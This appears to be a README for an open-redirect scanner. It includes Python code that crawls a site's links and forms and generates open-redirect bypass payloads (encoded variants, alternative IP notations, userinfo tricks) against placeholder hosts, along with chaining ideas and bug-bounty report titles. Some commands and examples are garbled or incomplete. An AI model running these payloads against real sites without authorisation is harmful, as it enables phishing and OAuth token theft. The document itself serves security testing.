After the GoLismero project died there was no longer any maintained open-source tool that collects links with parameters and web forms and then tests them, so I decided to write one myself. As a first step this tool collects all the entry points of the target website and then tries to find open redirect vulnerabilities in them.

Why is this project better than other open-redirect scanners? It recursively crawls all the links of the target website and finds potentially vulnerable web forms by itself, instead of relying on CommonCrawl or on a list of links supplied by the user. In the future I will probably add more modules to fuzz for SQL injection and XSS.
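The entry-point collection step described above, as an added example that is not the scanner's own code: it parses one fetched page (a constructed HTML snippet here, so it runs offline), keeps same-host links as the crawl queue, records links that carry query parameters and every form with its inputs, and flags parameters whose names commonly hold a redirect target. The parameter-name list and the base URL https://target.example are assumptions.

```python
"""Collect entry points (links with parameters, forms) from one HTML page.
Added example, not the project's code. Stdlib only: html.parser + urllib."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse

# Assumed heuristic: parameter names that often carry a redirect target.
REDIRECT_PARAM_NAMES = {
    "next", "url", "redirect", "redirect_uri", "redirect_url", "return",
    "returnurl", "return_to", "goto", "continue", "dest", "destination",
    "target", "to", "link", "r", "u",
}


class EntryPointParser(HTMLParser):
    """Walks a page and records same-host links and forms."""

    def __init__(self, base_url):
        super().__init__()
        self.base = base_url
        self.host = urlparse(base_url).netloc
        self.links = []        # same-host URLs, i.e. the crawl queue
        self.param_links = []  # subset of links that carry ?a=b parameters
        self.forms = []        # {"action", "method", "inputs": {name: value}}
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            url = urljoin(self.base, a["href"])  # resolve relative hrefs
            p = urlparse(url)
            # Stay on the target host; third-party links are not entry points.
            if p.scheme in ("http", "https") and p.netloc == self.host:
                self.links.append(url)
                if p.query:
                    self.param_links.append(url)
        elif tag == "form":
            self._form = {
                "action": urljoin(self.base, a.get("action") or self.base),
                "method": (a.get("method") or "get").upper(),
                "inputs": {},
            }
        elif tag in ("input", "textarea", "select") and self._form is not None:
            if a.get("name"):  # unnamed inputs (e.g. submit buttons) are not sent
                self._form["inputs"][a["name"]] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def collect_entry_points(base_url, html):
    """Return links, parameterised links and forms found on one page."""
    p = EntryPointParser(base_url)
    p.feed(html)
    return {"links": p.links, "param_links": p.param_links, "forms": p.forms}


def redirect_candidates(entry_points):
    """(method, url, param) triples whose parameter name suggests a redirect."""
    out = []
    for url in entry_points["param_links"]:
        for name in parse_qs(urlparse(url).query, keep_blank_values=True):
            if name.lower() in REDIRECT_PARAM_NAMES:
                out.append(("GET", url, name))
    for form in entry_points["forms"]:
        for name in form["inputs"]:
            if name.lower() in REDIRECT_PARAM_NAMES:
                out.append((form["method"], form["action"], name))
    return out


# Constructed sample page standing in for a fetched response.
BASE_URL = "https://target.example/index.html"
SAMPLE_HTML = """
<html><body>
<a href="/login?next=/account">Log in</a>
<a href="https://target.example/search?q=test">Search</a>
<a href="https://cdn.other.example/lib.js">external</a>
<a href="/about">About</a>
<form action="/go" method="get">
  <input type="hidden" name="url" value="/home">
  <input type="submit" value="Go">
</form>
<form action="/comment" method="post">
  <textarea name="body"></textarea>
</form>
</body></html>
"""

if __name__ == "__main__":
    ep = collect_entry_points(BASE_URL, SAMPLE_HTML)
    for cand in redirect_candidates(ep):
        print(cand)
```

A real crawler feeds every URL in `links` back through the same parser until no new same-host URL appears; the candidates are then the inputs handed to the redirect test.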


~$ git clone
~$ pip3 install -r requirements.txt


~$ python3.8 -u
~$ python3.8 -u -c 'Cookie: user=admin'

After a run you will also find newly created files containing the interesting links and all of the website's entry points.


• Try using the same parameter twice: ?
• If periods are filtered, use an IPv4 address in decimal notation
• Try double- and triple-URL-encoded versions of the payloads
• Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
• For XSS, try replacing alert(1) with prompt(1) and confirm(1)
• If the extension is checked, try ?image_url={payload}/.jpg
• Try (or [any_param] If it redirects to, then it’s vulnerable! and are different domains.
• Use the U+202E RIGHT-TO-LEFT OVERRIDE character (%E2%80%AE when URL-encoded): https://[email protected]%E2%80%[email protected]
—— The Unicode character U+202E makes all subsequent text render right-to-left
—— E.g.:
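The bypass tips above turned into code, as an added example (not the scanner's own implementation): a generator for the payload variants (scheme-relative, extension-check suffix, userinfo trick, IPv4 in decimal/hex/octal/dotted-hex and IPv4-mapped IPv6, each also single-, double- and triple-URL-encoded), a request builder that can send the parameter twice, and a verdict function that canonicalises the host in a Location header so a redirect to the attacker in any of those notations is recognised. The hosts evil.example, 1.2.3.4 and target.example are assumed.

```python
"""Open-redirect payload variants and a notation-aware verdict.
Added example, not the project's code. Assumed hosts: evil.example (attacker),
1.2.3.4 (attacker IP), target.example (target)."""
import ipaddress
from urllib.parse import parse_qsl, quote, urlencode, urljoin, urlparse, urlunparse


def ip_notations(ip):
    """Alternative spellings of a dotted-quad IPv4 address."""
    n = int(ipaddress.IPv4Address(ip))
    return [
        str(n),                                              # decimal
        "0x%08x" % n,                                        # hex
        "0%o" % n,                                           # octal
        ".".join("0x%02x" % int(o) for o in ip.split(".")),  # dotted hex
        "[::ffff:%s]" % ip,                                  # IPv4-mapped IPv6
    ]


def redirect_payloads(attacker_host, attacker_ip, target_host="target.example"):
    """(label, value) pairs. 'value' is what goes into the parameter;
    build_request_url() encodes it once more on the wire, so the enc1 form
    arrives double-encoded and enc2 triple-encoded, as the tips suggest."""
    raw = [
        ("abs", "https://%s/" % attacker_host),
        ("scheme-relative", "//%s/" % attacker_host),
        ("ext-check", "https://%s" % attacker_host + "/.jpg"),   # {payload}/.jpg
        ("userinfo", "https://%s@%s/" % (target_host, attacker_host)),
    ]
    raw += [("ip-" + n, "https://%s/" % n) for n in ip_notations(attacker_ip)]
    out = []
    for label, p in raw:
        enc1 = quote(p, safe="")
        enc2 = quote(enc1, safe="")
        out += [(label, p), (label + "+enc1", enc1), (label + "+enc2", enc2)]
    return out


def build_request_url(url, param, payload, duplicate=False):
    """Replace `param` in the query with `payload`; with duplicate=True send a
    benign first copy and the payload as the second (parameter-twice trick)."""
    parts = urlparse(url)
    q = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    if duplicate:
        q.append((param, "/"))
    q.append((param, payload))
    return urlunparse(parts._replace(query=urlencode(q)))


def _num(tok):
    """Parse one numeric host token the way browsers do (0x hex, leading-0 octal)."""
    if tok.startswith("0x"):
        return int(tok, 16)
    if len(tok) > 1 and tok.startswith("0"):
        return int(tok, 8)
    return int(tok)


def normalize_host(host):
    """Collapse IPv4-mapped IPv6, decimal/hex/octal and dotted-hex IPv4 forms
    to a dotted quad; plain names are lowercased."""
    h = host.strip().lower().strip("[]")
    try:
        ip = ipaddress.ip_address(h)
        if ip.version == 6 and ip.ipv4_mapped is not None:
            return str(ip.ipv4_mapped)
        return str(ip)
    except ValueError:
        pass
    try:
        parts = [_num(t) for t in h.split(".")]
        if len(parts) == 1:
            return str(ipaddress.IPv4Address(parts[0]))
        if len(parts) == 4 and all(0 <= p <= 255 for p in parts):
            return ".".join(str(p) for p in parts)
    except ValueError:
        pass
    return h


def is_open_redirect(request_url, location, attacker_identities):
    """True if the Location header (absolute or relative) lands on a host that
    is the attacker under any notation; relative Locations stay on-site."""
    target = urljoin(request_url, location)
    host = urlparse(target).hostname   # drops userinfo and IPv6 brackets
    if not host:
        return False
    wanted = {normalize_host(a) for a in attacker_identities}
    return normalize_host(host) in wanted


if __name__ == "__main__":
    req = "https://target.example/login?next=/account"
    for label, p in redirect_payloads("evil.example", "1.2.3.4"):
        print(label, build_request_url(req, "next", p))
    # Constructed Location values standing in for real responses.
    for loc in ("/account", "//16909060/", "https://target.example@evil.example/"):
        print(loc, is_open_redirect(req, loc, {"evil.example", "1.2.3.4"}))
```

The verdict deliberately compares the canonical host for equality rather than matching substrings, so a Location of https://evil.example.target.example/ (still on the target) is not reported, while 16909060, 0x01020304 and [::ffff:1.2.3.4] all collapse to 1.2.3.4 and are.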


• Phishing
• Chaining open redirect with
— • SSRF
— • OAuth token disclosure
— • XSS
— • CRLF injection

Open redirect writeups

Hackerone report 158434: Open Redirect & XSS on Shopify, $1,000
Hackerone report 101962: Open Redirect on Shopify, $500
Hackerone report 55546: Open Redirect on Shopify, $500
Hackerone report 55525: Open Redirect on Shopify, $500
Hackerone report 169759: Open Redirect on Shopify, $500
Hackerone report 160047: Open Redirect on Shopify, $500
Hackerone report 103772: Open Redirect on Shopify, $500
Hackerone report 159522: Open Redirect on Shopify, $500

